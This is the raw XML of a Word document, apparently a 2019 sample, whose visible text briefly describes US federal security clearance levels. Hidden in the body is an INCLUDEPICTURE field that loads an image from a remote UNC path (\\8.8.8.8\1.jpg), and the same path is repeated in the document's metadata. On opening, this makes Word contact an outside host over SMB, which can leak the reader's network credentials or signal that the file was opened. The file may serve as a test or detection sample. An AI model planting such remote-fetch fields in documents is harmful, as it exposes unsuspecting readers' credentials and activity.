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B278" w14:textId="77777777" w:rsidR="00646630" w:rsidRDefault="00646630" w:rsidP="00646630">
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62AC78" w14:textId="77777777" w:rsidR="00646630" w:rsidRDefault="00646630" w:rsidP="00646630">
      <w:r>
        <w:t>Security clearance levels are used as part of a method to control access to information that should not be freely available to all personnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F2945" w14:textId="77777777" w:rsidR="00646630" w:rsidRDefault="00646630" w:rsidP="00646630"/>
    <w:p w14:paraId="425F2651" w14:textId="77777777" w:rsidR="00646630" w:rsidRDefault="00646630" w:rsidP="00646630">
      <w:r>
        <w:t>The different organizations in the United States Federal Government use different terminology and lettering, as is discussed below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DBAC8" w14:textId="77777777" w:rsidR="00646630" w:rsidRDefault="00646630" w:rsidP="00646630"/>
    <w:p w14:paraId="34F66752" w14:textId="62C03E1A" w:rsidR="00646630" w:rsidRDefault="00646630" w:rsidP="00646630">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "\\\\8.8.8.8\\1.jpg" \d </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:pict w14:anchorId="041B4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r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2CA64E" w14:textId="2599CF0E" w:rsidR="00643947" w:rsidRDefault="00646630" w:rsidP="00646630">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="0064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30"/>
    <w:rsid w:val="00435B17"/>
    <w:rsid w:val="00646630"/>
    <w:rsid w:val="00E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AEFD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BDEB7A9A-D1B4-4655-A466-D243D9C8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\\8.8.8.8\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2019-11-16T00:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-16T00:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>